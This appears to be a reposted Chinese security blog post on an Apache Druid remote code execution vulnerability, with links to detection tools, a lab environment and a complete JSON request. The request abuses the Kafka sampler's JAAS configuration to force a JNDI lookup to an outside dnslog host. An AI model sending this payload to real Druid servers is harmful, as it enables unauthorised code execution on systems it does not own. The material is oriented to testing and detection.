本地检测工具:
复制链接https://stack.chaitin.com/tool/detail?id=735 前往 CT Stack 安全社区下载牧云本地检测工具。
执行 ./apache_druid_rce_scanner_linux_amd64 scan 即可扫描。
远程检测工具:
复制链接 https://stack.chaitin.com/tool/detail?id=1 前往xray - CT Stack 安全社区下载最新版本xray。
Druid 是一个高性能的实时分析数据库。德鲁伊的主要附加值是减少洞察力和行动的时间。Druid 专为快速查询和摄取非常重要的工作流而设计。Druid 擅长为 UI 提供动力、运行操作(临时)查询或处理高并发性。将 Druid 视为适用于各种用例的数据仓库的开源替代方案。设计文档解释了关键概念。Druid 提供了一组丰富的 API(通过 HTTP 和JDBC)来加载、管理和查询您的数据。您还可以通过内置的Web 控制台(如下所示)与 Druid 进行交互。
https://druid.apache.org/docs/latest/development/extensions-core/druid-basic-security.html
具体测试如下:
https://vulfocus.cn/#/dashboard
使用这个环境即可:
使用burp直接提交dnslog信息如下:
dnslog返回信息如下:
{"type":"kafka","spec":{"type":"kafka","ioConfig":{"type":"kafka","consumerProperties":{"bootstrap.servers":"6.6.6.6:9092","sasl.mechanism":"SCRAM-SHA-256","security.protocol":"SASL_SSL","sasl.jaas.config":"com.sun.security.auth.module.JndiLoginModule required user.provider.url=\"ldap://1nu5tj.dnslog.cn\" useFirstPass=\"true\" serviceName=\"x\" debug=\"true\" group.provider.url=\"xxx\";"},"topic":"any","useEarliestOffset":true,"inputFormat":{"type":"regex","pattern":"([\\s\\S]*)","listDelimiter":"56616469-6de2-9da4-efb8-8f416e6e6965","columns":["raw"]}},"dataSchema":{"dataSource":"sample","timestampSpec":{"column":"!!!_no_such_column_!!!","missingValue":"1970-01-01T00:00:00Z"},"dimensionsSpec":{},"granularitySpec":{"rollup":false}},"tuningConfig":{"type":"kafka"}},"samplerConfig":{"numRows":500,"timeoutMs":15000}}
参考连接:
http://www.xsssql.com/article/264.htmlhttps://mp.weixin.qq.com/s/cBnyUKQKPzGz0ZQwQgRjSw
文章来源: http://mp.weixin.qq.com/s?__biz=MzIxNTIzNTExMQ==&mid=2247489285&idx=1&sn=8881c80050b57afb0995583c3a6065ae&chksm=979a384da0edb15b318725b62c9bdd81c0f2aede14de093918d7e80274699555e3d07917d934#rd
如有侵权请联系:admin#unsafe.sh
如有侵权请联系:admin#unsafe.sh